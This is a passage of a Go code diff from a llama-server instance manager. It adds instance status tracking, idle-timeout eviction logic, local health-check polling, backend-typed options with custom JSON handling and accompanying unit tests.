}
// Note: Defaults are NOT applied during unmarshaling
// They should only be applied by NewInstance or SetOptions
if opts.AutoRestart != nil {
t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)")
}
}
func TestUnmarshalJSON_NoOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false
}`
var inst instance.Process
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("Expected running to be false")
}
opts := inst.GetOptions()
if opts != nil {
t.Error("Expected options to be nil when not provided in JSON")
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) { func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct { tests := []struct {
name string name string
@@ -377,13 +315,6 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
expectedMax int expectedMax int
expectedDelay int expectedDelay int
}{ }{
{
name: "nil values",
maxRestarts: nil,
restartDelay: nil,
expectedMax: 0, // Should remain nil, but we can't easily test nil in this structure
expectedDelay: 0,
},
{ {
name: "valid positive values", name: "valid positive values",
maxRestarts: testutil.IntPtr(10), maxRestarts: testutil.IntPtr(10),
@@ -416,29 +347,29 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts, MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay, RestartDelay: tt.restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
instance := instance.NewInstance("test", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions() opts := instance.GetOptions()
if tt.maxRestarts != nil {
if opts.MaxRestarts == nil { if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set") t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax { } else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts) t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
} }
}
if tt.restartDelay != nil {
if opts.RestartDelay == nil { if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set") t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay { } else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay) t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
} }
}
}) })
} }
} }

View File

@@ -4,6 +4,7 @@ import (
"context" "context"
"fmt" "fmt"
"log" "log"
"net/http"
"os/exec" "os/exec"
"runtime" "runtime"
"syscall" "syscall"
@@ -15,7 +16,7 @@ func (i *Process) Start() error {
i.mu.Lock() i.mu.Lock()
defer i.mu.Unlock() defer i.mu.Unlock()
if i.Running { if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name) return fmt.Errorf("instance %s is already running", i.Name)
} }
@@ -30,13 +31,15 @@ func (i *Process) Start() error {
i.restarts = 0 i.restarts = 0
} }
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create log files // Create log files
if err := i.logger.Create(); err != nil { if err := i.logger.Create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err) return fmt.Errorf("failed to create log files: %w", err)
} }
args := i.options.BuildCommandArgs() args := i.options.BuildCommandArgs()
i.ctx, i.cancel = context.WithCancel(context.Background()) i.ctx, i.cancel = context.WithCancel(context.Background())
i.cmd = exec.CommandContext(i.ctx, "llama-server", args...) i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
@@ -61,7 +64,7 @@ func (i *Process) Start() error {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err) return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
} }
i.Running = true i.SetStatus(Running)
// Create channel for monitor completion signaling // Create channel for monitor completion signaling
i.monitorDone = make(chan struct{}) i.monitorDone = make(chan struct{})
@@ -78,7 +81,7 @@ func (i *Process) Start() error {
func (i *Process) Stop() error { func (i *Process) Stop() error {
i.mu.Lock() i.mu.Lock()
if !i.Running { if !i.IsRunning() {
// Even if not running, cancel any pending restart // Even if not running, cancel any pending restart
if i.restartCancel != nil { if i.restartCancel != nil {
i.restartCancel() i.restartCancel()
@@ -95,8 +98,8 @@ func (i *Process) Stop() error {
i.restartCancel = nil i.restartCancel = nil
} }
// Set running to false first to signal intentional stop // Set status to stopped first to signal intentional stop
i.Running = false i.SetStatus(Stopped)
// Clean up the proxy // Clean up the proxy
i.proxy = nil i.proxy = nil
@@ -106,19 +109,25 @@ func (i *Process) Stop() error {
i.mu.Unlock() i.mu.Unlock()
// Stop the process with SIGINT // Stop the process with SIGINT if cmd exists
if i.cmd.Process != nil { if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil { if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err) log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
} }
} }
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select { select {
case <-monitorDone: case <-monitorDone:
// Process exited normally // Process exited normally
case <-time.After(30 * time.Second): case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds // Force kill if it doesn't exit within 30 seconds
if i.cmd.Process != nil { if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill() killErr := i.cmd.Process.Kill()
if killErr != nil { if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr) log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -140,6 +149,84 @@ func (i *Process) Stop() error {
return nil return nil
} }
func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
func (i *Process) WaitForHealthy(timeout int) error {
if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name)
}
if timeout <= 0 {
timeout = 30 // Default to 30 seconds if no timeout is specified
}
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
defer cancel()
// Get instance options to build the health check URL
opts := i.GetOptions()
if opts == nil {
return fmt.Errorf("instance %s has no options set", i.Name)
}
// Build the health check URL directly
var host string
var port int
switch opts.BackendType {
case "llama-cpp":
host = opts.LlamaServerOptions.Host
port = opts.LlamaServerOptions.Port
}
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
Timeout: 5 * time.Second, // 5 second timeout per request
}
// Helper function to check health directly
checkHealth := func() bool {
req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
if err != nil {
return false
}
resp, err := client.Do(req)
if err != nil {
return false
}
defer resp.Body.Close()
return resp.StatusCode == http.StatusOK
}
// Try immediate check first
if checkHealth() {
return nil // Instance is healthy
}
// If immediate check failed, start polling
ticker := time.NewTicker(1 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
case <-ticker.C:
if checkHealth() {
return nil // Instance is healthy
}
// Continue polling
}
}
}
func (i *Process) monitorProcess() { func (i *Process) monitorProcess() {
defer func() { defer func() {
i.mu.Lock() i.mu.Lock()
@@ -155,12 +242,12 @@ func (i *Process) monitorProcess() {
i.mu.Lock() i.mu.Lock()
// Check if the instance was intentionally stopped // Check if the instance was intentionally stopped
if !i.Running { if !i.IsRunning() {
i.mu.Unlock() i.mu.Unlock()
return return
} }
i.Running = false i.SetStatus(Stopped)
i.logger.Close() i.logger.Close()
// Cancel any existing restart context since we're handling a new exit // Cancel any existing restart context since we're handling a new exit
@@ -185,6 +272,7 @@ func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters // Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions() shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart { if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock() i.mu.Unlock()
return return
} }

141
pkg/instance/options.go Normal file
View File

@@ -0,0 +1,141 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// LlamaServerOptions contains the options for the llama server
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert LlamaServerOptions back to BackendOptions map for JSON
if c.BackendType == backends.BackendTypeLlamaCpp && c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs() []string {
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
return c.LlamaServerOptions.BuildCommandArgs()
}
}
return []string{}
}

70
pkg/instance/status.go Normal file
View File

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}

28
pkg/instance/timeout.go Normal file
View File

@@ -0,0 +1,28 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}

View File

@@ -0,0 +1,220 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}

View File

@@ -10,6 +10,7 @@ import (
"path/filepath" "path/filepath"
"strings" "strings"
"sync" "sync"
"time"
) )
// InstanceManager defines the interface for managing instances of the llama server. // InstanceManager defines the interface for managing instances of the llama server.
@@ -20,7 +21,9 @@ type InstanceManager interface {
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error) StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error) StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error) RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error) GetInstanceLogs(name string) (string, error)
Shutdown() Shutdown()
@@ -29,22 +32,52 @@ type InstanceManager interface {
type instanceManager struct { type instanceManager struct {
mu sync.RWMutex mu sync.RWMutex
instances map[string]*instance.Process instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool ports map[int]bool
instancesConfig config.InstancesConfig instancesConfig config.InstancesConfig
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
} }
// NewInstanceManager creates a new instance of InstanceManager. // NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager { func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{ im := &instanceManager{
instances: make(map[string]*instance.Process), instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool), ports: make(map[int]bool),
instancesConfig: instancesConfig, instancesConfig: instancesConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
} }
// Load existing instances from disk // Load existing instances from disk
if err := im.loadInstances(); err != nil { if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err) log.Printf("Error loading instances: %v", err)
} }
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
return im return im
} }
@@ -92,17 +125,43 @@ func (im *instanceManager) persistInstance(instance *instance.Process) error {
func (im *instanceManager) Shutdown() { func (im *instanceManager) Shutdown() {
im.mu.Lock() im.mu.Lock()
defer im.mu.Unlock()
var wg sync.WaitGroup // Check if already shutdown
wg.Add(len(im.instances)) if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
// Signal the timeout checker to stop
close(im.shutdownChan)
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances { for name, inst := range im.instances {
if !inst.Running { if inst.IsRunning() {
wg.Done() // If instance is not running, just mark it as done runningInstances = append(runningInstances, inst)
continue runningNames = append(runningNames, name)
}
} }
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) { go func(name string, inst *instance.Process) {
defer wg.Done() defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name) fmt.Printf("Stopping instance %s...\n", name)
@@ -110,7 +169,7 @@ func (im *instanceManager) Shutdown() {
if err := inst.Stop(); err != nil { if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err) fmt.Printf("Error stopping instance %s: %v\n", name, err)
} }
}(name, inst) }(runningNames[i], inst)
} }
wg.Wait() wg.Wait()
@@ -177,16 +236,20 @@ func (im *instanceManager) loadInstance(name, path string) error {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name) return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
} }
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup) // Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions()) inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set // Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created inst.Created = persistedInstance.Created
inst.Running = persistedInstance.Running inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps // Check for port conflicts and add to maps
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 { if inst.GetPort() > 0 {
port := inst.GetOptions().Port port := inst.GetPort()
if im.ports[port] { if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port) return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
} }
@@ -202,7 +265,7 @@ func (im *instanceManager) autoStartInstances() {
im.mu.RLock() im.mu.RLock()
var instancesToStart []*instance.Process var instancesToStart []*instance.Process
for _, inst := range im.instances { for _, inst := range im.instances {
if inst.Running && // Was running when persisted if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil && inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil && inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart { *inst.GetOptions().AutoRestart {
@@ -214,9 +277,20 @@ func (im *instanceManager) autoStartInstances() {
for _, inst := range instancesToStart { for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name) log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance) // Reset running state before starting (since Start() expects stopped instance)
inst.Running = false inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil { if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err) log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
} }
} }
} }
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}

View File

@@ -1,15 +1,16 @@
package manager_test package manager_test
import ( import (
"encoding/json" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config" "llamactl/pkg/config"
"llamactl/pkg/instance" "llamactl/pkg/instance"
"llamactl/pkg/manager" "llamactl/pkg/manager"
"os" "os"
"path/filepath" "path/filepath"
"reflect"
"strings" "strings"
"sync"
"testing" "testing"
) )
@@ -22,15 +23,16 @@ func TestNewInstanceManager(t *testing.T) {
DefaultAutoRestart: true, DefaultAutoRestart: true,
DefaultMaxRestarts: 3, DefaultMaxRestarts: 3,
DefaultRestartDelay: 5, DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
} }
manager := manager.NewInstanceManager(cfg) mgr := manager.NewInstanceManager(cfg)
if manager == nil { if mgr == nil {
t.Fatal("NewInstanceManager returned nil") t.Fatal("NewInstanceManager returned nil")
} }
// Test initial state // Test initial state
instances, err := manager.ListInstances() instances, err := mgr.ListInstances()
if err != nil { if err != nil {
t.Fatalf("ListInstances failed: %v", err) t.Fatalf("ListInstances failed: %v", err)
} }
@@ -39,479 +41,27 @@ func TestNewInstanceManager(t *testing.T) {
} }
} }
func TestCreateInstance_Success(t *testing.T) { func TestPersistence(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("New instance should not be running")
}
if inst.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
}
}
func TestCreateInstance_DuplicateName(t *testing.T) {
manager := createTestManager()
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create first instance
_, err := manager.CreateInstance("test-instance", options1)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = manager.CreateInstance("test-instance", options2)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
// Create manager with low max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 2, // Very low limit for testing
}
manager := manager.NewInstanceManager(cfg)
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances up to the limit
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
